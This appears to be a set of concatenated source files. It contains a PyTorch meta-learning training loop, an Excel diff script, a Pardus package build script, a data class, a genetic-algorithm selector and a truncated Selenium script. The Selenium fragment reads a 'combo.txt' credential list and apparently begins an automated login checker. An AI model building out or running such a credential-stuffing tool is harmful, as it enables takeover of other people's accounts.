zero_grad(orderd_params_conv12.values())\r\n zero_grad(orderd_params_conv13.values())\r\n grads_fc = torch.autograd.grad(loss, orderd_params_fc.values(), allow_unused=True, retain_graph=True)\r\n grads_conv11 = torch.autograd.grad(loss, orderd_params_conv11.values(), allow_unused=True, retain_graph=True)\r\n grads_conv12 = torch.autograd.grad(loss, orderd_params_conv12.values(), allow_unused=True, retain_graph=True)\r\n grads_conv13 = torch.autograd.grad(loss, orderd_params_conv13.values(), allow_unused=True)\r\n # print('grads:', grads)\r\n # print(\"orderd_params.items():\", orderd_params.items())\r\n for (key, val), grad in zip(orderd_params_fc.items(), grads_fc):\r\n if grad is not None:\r\n fast_weights['fc'][key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv11.items(), grads_conv11):\r\n if grad is not None:\r\n fast_weights['conv11'][key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv12.items(), grads_conv12):\r\n if grad is not None:\r\n fast_weights['conv12'][key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv13.items(), grads_conv13):\r\n if grad is not None:\r\n fast_weights['conv13'][key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n \"\"\"计算Q上的损失\"\"\"\r\n CN = model['G'].forward_once_with_param(class_names_dict, fast_weights)\r\n XQ = model['G'].forward_once_with_param(query, fast_weights)\r\n logits_q = pos_dist(XQ, CN)\r\n # print(\"logits_q:\", logits_q)\r\n logits_q = dis_to_level(logits_q)\r\n q_loss = model['G'].loss(logits_q, YQ)\r\n # print(\"q_loss:\", q_loss)\r\n _, pred = torch.max(logits_q, 1)\r\n acc_q = model['G'].accuracy(pred, YQ)\r\n\r\n # optG.zero_grad()\r\n # q_loss.backward()\r\n # optG.step()\r\n\r\n return q_loss, acc_q\r\n\r\n\r\ndef train(train_data, val_data, test_data, model, class_names, criterion, args):\r\n '''\r\n Train the model\r\n Use val_data to do early stopping\r\n '''\r\n # creating a tmp directory to save the models\r\n out_dir = os.path.abspath(os.path.join(\r\n os.path.curdir,\r\n \"tmp-runs\",\r\n str(int(time.time() * 1e7))))\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n best_acc = 0\r\n sub_cycle = 0\r\n best_path = None\r\n\r\n if args.STS == True:\r\n classes_sample_p, example_prob_metrix = pre_calculate(train_data, class_names, model['G'], args)\r\n else:\r\n classes_sample_p, example_prob_metrix = None, None\r\n\r\n optG = torch.optim.Adam(grad_param(model, ['G']), lr=args.meta_lr, weight_decay=args.weight_decay)\r\n # optG2 = torch.optim.Adam(grad_param(model, ['G2']), lr=args.task_lr)\r\n # optCLF = torch.optim.Adam(grad_param(model, ['clf']), lr=args.task_lr)\r\n\r\n if args.lr_scheduler == 'ReduceLROnPlateau':\r\n schedulerG = torch.optim.lr_scheduler.ReduceLROnPlateau(\r\n optG, 'max', patience=args.patience // 2, factor=0.1, verbose=True)\r\n # schedulerCLF = torch.optim.lr_scheduler.ReduceLROnPlateau(\r\n # optCLF, 'max', patience=args.patience // 2, factor=0.1, verbose=True)\r\n\r\n elif args.lr_scheduler == 'ExponentialLR':\r\n schedulerG = torch.optim.lr_scheduler.ExponentialLR(optG, gamma=args.ExponentialLR_gamma)\r\n # schedulerCLF = torch.optim.lr_scheduler.ExponentialLR(optCLF, gamma=args.ExponentialLR_gamma)\r\n\r\n print(\"{}, Start training\".format(\r\n datetime.datetime.now()), flush=True)\r\n\r\n\r\n # sampled_classes, source_classes = task_sampler(train_data, args)\r\n acc = 0\r\n loss = 0\r\n for ep in range(args.train_epochs):\r\n ep_loss = 0\r\n for _ in range(args.train_episodes):\r\n\r\n sampled_classes, source_classes = task_sampler(train_data, args, classes_sample_p)\r\n\r\n train_gen = SerialSampler(train_data, args, sampled_classes, source_classes, 1, example_prob_metrix)\r\n\r\n sampled_tasks = train_gen.get_epoch()\r\n\r\n grad = {'clf': [], 'G': []}\r\n\r\n if not args.notqdm:\r\n sampled_tasks = tqdm(sampled_tasks, total=train_gen.num_episodes,\r\n ncols=80, leave=False, desc=colored('Training on train',\r\n 'yellow'))\r\n\r\n for task in sampled_tasks:\r\n if task is None:\r\n break\r\n q_loss, q_acc = train_one(task, class_names, model, optG, criterion, args, grad)\r\n acc += q_acc\r\n loss = loss + q_loss\r\n ep_loss = ep_loss + q_loss\r\n\r\n ep_loss = ep_loss / args.train_episodes\r\n\r\n optG.zero_grad()\r\n ep_loss.backward()\r\n optG.step()\r\n\r\n if ep % 100 == 0:\r\n print(\"{}:\".format(colored('--------[TRAIN] ep', 'blue')) + str(ep) + \", loss:\" + str(q_loss.item()) + \", acc:\" + str(\r\n q_acc.item()) + \"-----------\")\r\n\r\n test_count = 100\r\n # if (ep % test_count == 0) and (ep != 0):\r\n if (ep % test_count == 0):\r\n acc = acc / args.train_episodes / test_count\r\n loss = loss / args.train_episodes / test_count\r\n print(\"{}:\".format(colored('--------[TRAIN] ep', 'blue')) + str(ep) + \", mean_loss:\" + str(loss.item()) + \", mean_acc:\" + str(\r\n acc.item()) + \"-----------\")\r\n\r\n net = copy.deepcopy(model)\r\n # acc, std = test(train_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n # print(\"[TRAIN] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f} \".format(\r\n # datetime.datetime.now(),\r\n # \"ep\", ep,\r\n # colored(\"train\", \"red\"),\r\n # colored(\"acc:\", \"blue\"), acc, std,\r\n # ), flush=True)\r\n acc = 0\r\n loss = 0\r\n\r\n # Evaluate test accuracy\r\n cur_acc, cur_std = test(test_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n print((\"[TEST] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n \"ep\", ep,\r\n colored(\"test \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), cur_acc, cur_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # Evaluate validation accuracy\r\n cur_acc, cur_std = test(val_data, class_names, optG, net, criterion, args, args.test_epochs, False)\r\n print((\"[EVAL] {}, {:s} {:2d}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n \"ep\", ep,\r\n colored(\"val \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), cur_acc, cur_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # Update the current best model if val acc is better\r\n if cur_acc > best_acc:\r\n best_acc = cur_acc\r\n best_path = os.path.join(out_dir, str(ep))\r\n\r\n # save current model\r\n print(\"{}, Save cur best model to {}\".format(\r\n datetime.datetime.now(),\r\n best_path))\r\n\r\n torch.save(model['G'].state_dict(), best_path + '.G')\r\n # torch.save(model['G2'].state_dict(), best_path + '.G2')\r\n # torch.save(model['clf'].state_dict(), best_path + '.clf')\r\n\r\n sub_cycle = 0\r\n else:\r\n sub_cycle += 1\r\n\r\n # Break if the val acc hasn't improved in the past patience epochs\r\n if sub_cycle == args.patience:\r\n break\r\n\r\n if args.lr_scheduler == 'ReduceLROnPlateau':\r\n schedulerG.step(cur_acc)\r\n # schedulerCLF.step(cur_acc)\r\n\r\n elif args.lr_scheduler == 'ExponentialLR':\r\n schedulerG.step()\r\n # schedulerCLF.step()\r\n\r\n print(\"{}, End of training. Restore the best weights\".format(\r\n datetime.datetime.now()),\r\n flush=True)\r\n\r\n # restore the best saved model\r\n model['G'].load_state_dict(torch.load(best_path + '.G'))\r\n # model['G2'].load_state_dict(torch.load(best_path + '.G2'))\r\n # model['clf'].load_state_dict(torch.load(best_path + '.clf'))\r\n\r\n if args.save:\r\n # save the current model\r\n out_dir = os.path.abspath(os.path.join(\r\n os.path.curdir,\r\n \"saved-runs\",\r\n str(int(time.time() * 1e7))))\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n best_path = os.path.join(out_dir, 'best')\r\n\r\n print(\"{}, Save best model to {}\".format(\r\n datetime.datetime.now(),\r\n best_path), flush=True)\r\n\r\n torch.save(model['G'].state_dict(), best_path + '.G')\r\n # torch.save(model['clf'].state_dict(), best_path + '.clf')\r\n\r\n with open(best_path + '_args.txt', 'w') as f:\r\n for attr, value in sorted(args.__dict__.items()):\r\n f.write(\"{}={}\\n\".format(attr, value))\r\n\r\n return optG\r\n\r\n\r\ndef test_one(task, class_names, model, optG, criterion, args, grad):\r\n '''\r\n Train the model on one sampled task.\r\n '''\r\n model['G'].eval()\r\n\r\n support, query = task\r\n # print(\"support, query:\", support, query)\r\n # print(\"class_names_dict:\", class_names_dict)\r\n\r\n '''分样本对'''\r\n YS = support['label']\r\n YQ = query['label']\r\n\r\n sampled_classes = torch.unique(support['label']).cpu().numpy().tolist()\r\n # print(\"sampled_classes:\", sampled_classes)\r\n\r\n class_names_dict = {}\r\n class_names_dict['label'] = class_names['label'][sampled_classes]\r\n # print(\"class_names_dict['label']:\", class_names_dict['label'])\r\n class_names_dict['text'] = class_names['text'][sampled_classes]\r\n class_names_dict['text_len'] = class_names['text_len'][sampled_classes]\r\n class_names_dict['is_support'] = False\r\n class_names_dict = utils.to_tensor(class_names_dict, args.cuda, exclude_keys=['is_support'])\r\n\r\n YS, YQ = reidx_y(args, YS, YQ)\r\n # print('YS:', support['label'])\r\n # print('YQ:', query['label'])\r\n # print(\"class_names_dict:\", class_names_dict['label'])\r\n\r\n \"\"\"维度填充\"\"\"\r\n if support['text'].shape[1] > class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (class_names_dict['text'].shape[0], support['text'].shape[1] - class_names_dict['text'].shape[1]),\r\n dtype=torch.long)\r\n class_names_dict['text'] = torch.cat((class_names_dict['text'], zero.cuda()), dim=-1)\r\n elif support['text'].shape[1] < class_names_dict['text'].shape[1]:\r\n zero = torch.zeros(\r\n (support['text'].shape[0], class_names_dict['text'].shape[1] - support['text'].shape[1]),\r\n dtype=torch.long)\r\n support['text'] = torch.cat((support['text'], zero.cuda()), dim=-1)\r\n\r\n support['text'] = torch.cat((support['text'], class_names_dict['text']), dim=0)\r\n support['text_len'] = torch.cat((support['text_len'], class_names_dict['text_len']), dim=0)\r\n support['label'] = torch.cat((support['label'], class_names_dict['label']), dim=0)\r\n # print(\"support['text']:\", support['text'].shape)\r\n # print(\"support['label']:\", support['label'])\r\n\r\n text_sample_len = support['text'].shape[0]\r\n # print(\"support['text'].shape[0]:\", support['text'].shape[0])\r\n support['text_1'] = support['text'][0].view((1, -1))\r\n support['text_len_1'] = support['text_len'][0].view(-1)\r\n support['label_1'] = support['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_1'] = torch.cat((support['text_1'], support['text'][i].view((1, -1))), dim=0)\r\n support['text_len_1'] = torch.cat((support['text_len_1'], support['text_len'][i].view(-1)), dim=0)\r\n support['label_1'] = torch.cat((support['label_1'], support['label'][i].view(-1)), dim=0)\r\n\r\n support['text_2'] = class_names_dict['text'][0].view((1, -1))\r\n support['text_len_2'] = class_names_dict['text_len'][0].view(-1)\r\n support['label_2'] = class_names_dict['label'][0].view(-1)\r\n for i in range(text_sample_len):\r\n if i == 0:\r\n for j in range(1, len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n else:\r\n for j in range(len(sampled_classes)):\r\n support['text_2'] = torch.cat((support['text_2'], class_names_dict['text'][j].view((1, -1))), dim=0)\r\n support['text_len_2'] = torch.cat((support['text_len_2'], class_names_dict['text_len'][j].view(-1)),dim=0)\r\n support['label_2'] = torch.cat((support['label_2'], class_names_dict['label'][j].view(-1)), dim=0)\r\n\r\n # print(\"support['text_1']:\", support['text_1'].shape, support['text_len_1'].shape, support['label_1'].shape)\r\n # print(\"support['text_2']:\", support['text_2'].shape, support['text_len_2'].shape, support['label_2'].shape)\r\n support['label_final'] = support['label_1'].eq(support['label_2']).int()\r\n\r\n support_1 = {}\r\n support_1['text'] = support['text_1']\r\n support_1['text_len'] = support['text_len_1']\r\n support_1['label'] = support['label_1']\r\n\r\n support_2 = {}\r\n support_2['text'] = support['text_2']\r\n support_2['text_len'] = support['text_len_2']\r\n support_2['label'] = support['label_2']\r\n # print(\"**************************************\")\r\n # print(\"1111111\", support['label_1'])\r\n # print(\"2222222\", support['label_2'])\r\n # print(support['label_final'])\r\n\r\n '''first step'''\r\n S_out1, S_out2 = model['G'](support_1, support_2)\r\n\r\n supp_, que_ = model['G'](support, query)\r\n loss_weight = get_weight_of_test_support(supp_, que_, args)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"s_1_loss:\", loss)\r\n zero_grad(model['G'].parameters())\r\n\r\n grads_fc = autograd.grad(loss, model['G'].fc.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_fc, orderd_params_fc = model['G'].cloned_fc_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].fc.named_parameters(), grads_fc):\r\n fast_weights_fc[key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n grads_conv11 = autograd.grad(loss, model['G'].conv11.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv11, orderd_params_conv11 = model['G'].cloned_conv11_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv11.named_parameters(), grads_conv11):\r\n fast_weights_conv11[key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n grads_conv12 = autograd.grad(loss, model['G'].conv12.parameters(), allow_unused=True, retain_graph=True)\r\n fast_weights_conv12, orderd_params_conv12 = model['G'].cloned_conv12_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv12.named_parameters(), grads_conv12):\r\n fast_weights_conv12[key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n grads_conv13 = autograd.grad(loss, model['G'].conv13.parameters(), allow_unused=True)\r\n fast_weights_conv13, orderd_params_conv13 = model['G'].cloned_conv13_dict(), OrderedDict()\r\n for (key, val), grad in zip(model['G'].conv13.named_parameters(), grads_conv13):\r\n fast_weights_conv13[key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n\r\n fast_weights = {}\r\n fast_weights['fc'] = fast_weights_fc\r\n fast_weights['conv11'] = fast_weights_conv11\r\n fast_weights['conv12'] = fast_weights_conv12\r\n fast_weights['conv13'] = fast_weights_conv13\r\n\r\n '''steps remaining'''\r\n for k in range(args.test_iter - 1):\r\n S_out1, S_out2 = model['G'](support_1, support_2, fast_weights)\r\n\r\n supp_, que_ = model['G'](support, query, fast_weights)\r\n loss_weight = get_weight_of_test_support(supp_, que_, args)\r\n\r\n loss = criterion(S_out1, S_out2, support['label_final'], loss_weight)\r\n # print(\"train_iter: {} s_loss:{}\".format(k, loss))\r\n zero_grad(orderd_params_fc.values())\r\n zero_grad(orderd_params_conv11.values())\r\n zero_grad(orderd_params_conv12.values())\r\n zero_grad(orderd_params_conv13.values())\r\n grads_fc = torch.autograd.grad(loss, orderd_params_fc.values(), allow_unused=True, retain_graph=True)\r\n grads_conv11 = torch.autograd.grad(loss, orderd_params_conv11.values(), allow_unused=True, retain_graph=True)\r\n grads_conv12 = torch.autograd.grad(loss, orderd_params_conv12.values(), allow_unused=True, retain_graph=True)\r\n grads_conv13 = torch.autograd.grad(loss, orderd_params_conv13.values(), allow_unused=True)\r\n\r\n for (key, val), grad in zip(orderd_params_fc.items(), grads_fc):\r\n if grad is not None:\r\n fast_weights['fc'][key] = orderd_params_fc[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv11.items(), grads_conv11):\r\n if grad is not None:\r\n fast_weights['conv11'][key] = orderd_params_conv11[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv12.items(), grads_conv12):\r\n if grad is not None:\r\n fast_weights['conv12'][key] = orderd_params_conv12[key] = val - args.task_lr * grad\r\n\r\n for (key, val), grad in zip(orderd_params_conv13.items(), grads_conv13):\r\n if grad is not None:\r\n fast_weights['conv13'][key] = orderd_params_conv13[key] = val - args.task_lr * grad\r\n\r\n \"\"\"计算Q上的损失\"\"\"\r\n CN = model['G'].forward_once_with_param(class_names_dict, fast_weights)\r\n XQ = model['G'].forward_once_with_param(query, fast_weights)\r\n logits_q = pos_dist(XQ, CN)\r\n logits_q = dis_to_level(logits_q)\r\n _, pred = torch.max(logits_q, 1)\r\n acc_q = model['G'].accuracy(pred, YQ)\r\n\r\n return acc_q\r\n\r\n\r\ndef test(test_data, class_names, optG, model, criterion, args, test_epoch, verbose=True):\r\n '''\r\n Evaluate the model on a bag of sampled tasks. Return the mean accuracy\r\n and its std.\r\n '''\r\n # model['G'].train()\r\n\r\n acc = []\r\n\r\n for ep in range(test_epoch):\r\n #print(\"**********************test ep******************************\",ep)\r\n\r\n sampled_classes, source_classes = task_sampler(test_data, args)\r\n\r\n train_gen = SerialSampler(test_data, args, sampled_classes, source_classes, 1)\r\n\r\n sampled_tasks = train_gen.get_epoch()\r\n\r\n for task in sampled_tasks:\r\n if task is None:\r\n break\r\n q_acc = test_one(task, class_names, model, optG, criterion, args, grad={})\r\n acc.append(q_acc.cpu().item())\r\n\r\n acc = np.array(acc)\r\n\r\n if verbose:\r\n if args.embedding != 'mlada':\r\n print(\"{}, {:s} {:>7.4f}, {:s} {:>7.4f}\".format(\r\n datetime.datetime.now(),\r\n colored(\"test acc mean\", \"blue\"),\r\n np.mean(acc),\r\n colored(\"test std\", \"blue\"),\r\n np.std(acc),\r\n ), flush=True)\r\n else:\r\n print(\"{}, {:s} {:>7.4f}, {:s} {:>7.4f}\".format(\r\n datetime.datetime.now(),\r\n colored(\"test acc mean\", \"blue\"),\r\n np.mean(acc),\r\n colored(\"test std\", \"blue\"),\r\n np.std(acc),\r\n ), flush=True)\r\n\r\n return np.mean(acc), np.std(acc)\r\n\r\n\r\ndef main():\r\n args = parse_args()\r\n\r\n # 可以打印到本地!存储下来\r\n if args.path != \"\":\r\n path = args.path\r\n sys.stdout = open(path, \"w\")\r\n print(\"test sys.stdout\")\r\n\r\n print_args(args)\r\n\r\n set_seed(args.seed)\r\n\r\n # load data\r\n train_data, val_data, test_data, class_names, vocab = loader.load_dataset(args)\r\n\r\n args.id2word = vocab.itos\r\n\r\n # initialize model\r\n model = {}\r\n model[\"G\"] = get_embedding(vocab, args)\r\n print(\"-------------------------------------param----------------------------------------------\")\r\n sum = 0\r\n for name, param in model[\"G\"].named_parameters():\r\n num = 1\r\n for size in param.shape:\r\n num *= size\r\n sum += num\r\n print(\"{:30s} : {}\".format(name, param.shape))\r\n print(\"total param num {}\".format(sum))\r\n print(\"-------------------------------------param----------------------------------------------\")\r\n\r\n criterion = ContrastiveLoss()\r\n # model[\"G2\"] = get_embedding_M2(vocab, args)\r\n # model[\"clf\"] = get_classifier(model[\"G\"].hidden_size * 2, args)\r\n\r\n if args.mode == \"train\":\r\n # train model on train_data, early stopping based on val_data\r\n optG = train(train_data, val_data, test_data, model, class_names, criterion, args)\r\n\r\n # val_acc, val_std, _ = test(val_data, model, args,\r\n # args.val_episodes)\r\n\r\n test_acc, test_std = test(test_data, class_names, optG, model, criterion, args, args.test_epochs, False)\r\n print((\"[TEST] {}, {:s} {:s}{:>7.4f} ± {:>6.4f}, \"\r\n ).format(\r\n datetime.datetime.now(),\r\n colored(\"test \", \"cyan\"),\r\n colored(\"acc:\", \"blue\"), test_acc, test_std,\r\n # colored(\"train stats\", \"cyan\"),\r\n # colored(\"G_grad:\", \"blue\"), np.mean(np.array(grad['G'])),\r\n # colored(\"clf_grad:\", \"blue\"), np.mean(np.array(grad['clf'])),\r\n ), flush=True)\r\n\r\n # path_drawn = args.path_drawn_data\r\n # with open(path_drawn, 'w') as f_w:\r\n # json.dump(drawn_data, f_w)\r\n # print(\"store drawn data finished.\")\r\n\r\n # file_path = r'../data/attention_data.json'\r\n # Print_Attention(file_path, vocab, model, args)\r\n\r\n if args.result_path:\r\n directory = args.result_path[:args.result_path.rfind(\"/\")]\r\n if not os.path.exists(directory):\r\n os.mkdirs(directory)\r\n\r\n result = {\r\n \"test_acc\": test_acc,\r\n \"test_std\": test_std,\r\n # \"val_acc\": val_acc,\r\n # \"val_std\": val_std\r\n }\r\n\r\n for attr, value in sorted(args.__dict__.items()):\r\n result[attr] = value\r\n\r\n with open(args.result_path, \"wb\") as f:\r\n pickle.dump(result, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"src/main_simaese_network.py","file_name":"main_simaese_network.py","file_ext":"py","file_size_in_byte":43051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633886776","text":"import argparse\nimport itertools\nimport os\nimport sys\n\nfrom openpyxl import Workbook, load_workbook\n\narg_parser = argparse.ArgumentParser()\n\narg_parser.add_argument(\"lhs_file\", type=str, help=\"\")\n\narg_parser.add_argument(\"rhs_file\", type=str, help=\"\")\n\nargs = arg_parser.parse_args()\n\nif not os.path.exists(args.lhs_file):\n print(\n \"error: path does not exist: {}\".format(args.lhs_file), file=sys.stderr\n )\n exit(1)\nif not os.path.exists(args.rhs_file):\n print(\n \"error: path does not exist: {}\".format(args.rhs_file), file=sys.stderr\n )\n exit(1)\n\nlhs_wb = load_workbook(args.lhs_file)\nrhs_wb = load_workbook(args.rhs_file)\n\nlhs_sheet = lhs_wb.active\nrhs_sheet = rhs_wb.active\n\nif lhs_sheet.max_row != rhs_sheet.max_row:\n print(\"Excel files have different number of rows\")\n exit(1)\nif lhs_sheet.max_column != rhs_sheet.max_column:\n print(\"Excel files have different number of columns\")\n exit(1)\n\nerrors = []\nfor row_num in range(1, lhs_sheet.max_row):\n for col_num in range(1, lhs_sheet.max_column):\n lhs_cell = lhs_sheet.cell(row=row_num, column=col_num)\n rhs_cell = rhs_sheet.cell(row=row_num, column=col_num)\n if lhs_cell.value != rhs_cell.value:\n errors.append(\n f\"Cell {lhs_cell}: '{lhs_cell.value}' != '{rhs_cell.value}'\"\n )\n\nif errors:\n print(\"Excel Diff: files are not equal:\")\n for error in errors:\n print(error)\n exit(1)\n","sub_path":"tests/integration/excel_diff.py","file_name":"excel_diff.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323118702","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright © 2005, 2006 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/copyleft/gpl.txt.\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir = \"fpc\"\n\ndef build():\n autotools.make(\"all\")\n\ndef install():\n autotools.rawInstall(\"INSTALL_PREFIX=%s/usr\" % get.installDIR())\n pisitools.dosym(\"/usr/lib/fpc/%s/ppc386\" % get.srcVERSION(), \"/usr/bin/ppc386\")\n\n shelltools.system(\"%s/usr/lib/fpc/%s/samplecfg /usr/lib/fpc/%s %s/etc\" \\\n % (get.installDIR(), get.srcVERSION(), \\\n get.srcVERSION(), get.installDIR()))\n\n pisitools.rename(\"/usr/share/doc/fpc-%s\" % get.srcVERSION(), get.srcTAG())\n pisitools.dodoc(\"compiler/COPYING\", \"compiler/README*\", \"fcl/COPYING.*\")\n\n autotools.make(\"clean\")\n pisitools.dodir(\"/usr/share/fpcsrc\")\n for tree in (\"compiler\", \"fcl\", \"fv\", \"ide\", \"installer\", \"packages\", \"rtl\", \"tests\", \"utils\"):\n shelltools.copytree(\"%s/\" % tree, \"%s/usr/share/fpcsrc/%s\" % (get.installDIR(), tree))\n shelltools.copy(\"Makefile*\", \"%s/usr/share/fpcsrc/\" % get.installDIR())\n\n shelltools.system(\"find %s -name '.svn' -type d -exec rm -rf {} \\; 2>/dev/null\" % get.installDIR())\n\n","sub_path":"pardus/tags/2007-EOL/programming/languages/pascal/fpc/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"625601339","text":"class Information:\n\n \"\"\"\n Diese Klasse übernimmt die Rolle eines InformationsPaketes.\n Objekte werden leer erstellt, rumgereicht, befüllt und am Ende in Excel geschrieben\n \"\"\"\n\n url: str = \"\"\n datum: str = \"\"\n zeit: str = \"\"\n postfach: str = \"\"\n auftragsnummer = \"\"\n ba_id = \"\"\n filter_id = \"\"\n vz_nummer = \"\"\n bnr = \"\"\n beanstandung = \"\"\n kundencodierung = \"\"\n wekstattcodierung = \"\"\n postfach_filter = \"\"\n\n class Ansprechpartner:\n name = \"\"\n tel = \"\"\n plz = \"\"\n ort = \"\"\n\n def give_name(self):\n \"\"\"\n Returned den Ansprechpartner in einer Zeile\n \"\"\"\n return \"{} Tel: {} Adr: {} {}\".format(self.name, self.tel, self.plz, self.ort)\n\n ansprechpartner = Ansprechpartner()\n\n class Fahrzeugdaten:\n marke = \"\"\n modell_jahr = \"\"\n verkaufstyp = \"\"\n verkaufstyp_beschreibung = \"\"\n motor = \"\"\n getriebe = \"\"\n auslieferungs_datum = \"\"\n fahrgestellnr = \"\"\n laufleistung = \"\"\n\n def print_info(self):\n \"\"\"\n Returned alle Infos in einer Zeile\n \"\"\"\n return \"Marke: {} ModellJahr: {} Verkaufstyp: {} VerkaufsTyp_Besch: {} Motor: {} \" \\\n \"Getriebe: {} AuslieferungsDatum: {} FahrgestellNr: {} Laufleistung: {}\".format(self.marke, self.modell_jahr, self.verkaufstyp, self.verkaufstyp_beschreibung\n , self.motor, self.getriebe, self.auslieferungs_datum, self.fahrgestellnr, self.laufleistung)\n\n fahrzeugdaten = Fahrzeugdaten()\n\n class Partnerdaten:\n firma = \"\"\n # ort = \"\"\n # name = \"\"\n # org_id = \"\"\n # vs = \"\"\n # region = \"\"\n # tel = \"\"\n # email = \"\"\n # plz = \"\"\n # straße = \"\"\n\n # def print_info(self):\n # \"\"\"\n # Returned die Partnerdaten in einer Zeile\n # \"\"\"\n # return \"Firma : {}, Ort: {}, Name: {}, Org-ID: {}, VS: {}, Region: {}, Tel: {}, Email: {}, PLZ: {}, Straße: {}\"\\\n # .format(self.firma, self.ort, self.name, self.org_id, self.vs, self.region, self.tel, self.email, self.plz, self.straße)\n\n partnerdaten = Partnerdaten()\n","sub_path":"Python/lib/Information.py","file_name":"Information.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359567033","text":"import numpy as np\n\n\nclass ParentSelectorASRS(object):\n pop_size = 0\n reproduction_num = 0\n roulette_constant = 0\n\n roulette_fit_array = None\n roulette_fit_sum = 0.0\n\n def __init__(self, pop_size=0, reproduction_num=1, roulette_constant=2):\n self.pop_size = pop_size\n self.reproduction_num = reproduction_num\n self.roulette_constant = roulette_constant\n\n def initialize_roulette_array(self, current_pop):\n roulette_fit_array = np.zeros(self.pop_size, dtype=np.float64)\n for i in range(0, self.pop_size):\n roulette_fit_array[i] = current_pop.chromosome_list[i].fitness\n roulette_fit_array = (current_pop.worst_fitness - current_pop.best_fitness) / (self.roulette_constant - 1)\\\n + current_pop.worst_fitness - roulette_fit_array\n self.roulette_fit_array = roulette_fit_array.cumsum()\n self.roulette_fit_sum = self.roulette_fit_array[-1]\n\n def get_good_parent(self):\n if self.roulette_fit_array[-1] == 0:\n parent_index = np.random.randint(0, self.pop_size)\n else:\n roulette = np.random.rand() * self.roulette_fit_sum\n parent_index = (self.roulette_fit_array < roulette).argmin()\n return parent_index\n\n def get_not_similar_parent(self):\n pass\n\n def get_parents(self, current_pop):\n self.initialize_roulette_array(current_pop)\n parents_pair_dic = {}\n for i in range(0, self.reproduction_num):\n parents_idx_list = []\n while len(parents_idx_list) < 2:\n parent_idx = self.get_good_parent()\n if not(parent_idx in parents_idx_list):\n parents_idx_list.append(parent_idx)\n parents_pair_dic[i] = parents_idx_list\n return parents_pair_dic","sub_path":"GA/genetic_operator/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309304452","text":"\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n#fname = input(\"Enter A File Name :\") #comment that if u wanna the script work automatic after that folow NEXT Line \nffile = open('combo.txt') #changing ffile = open('YOUR FILE NAME ')\nbrowser = webdriver.Chrome(ChromeDriverManager().install())\nusername = 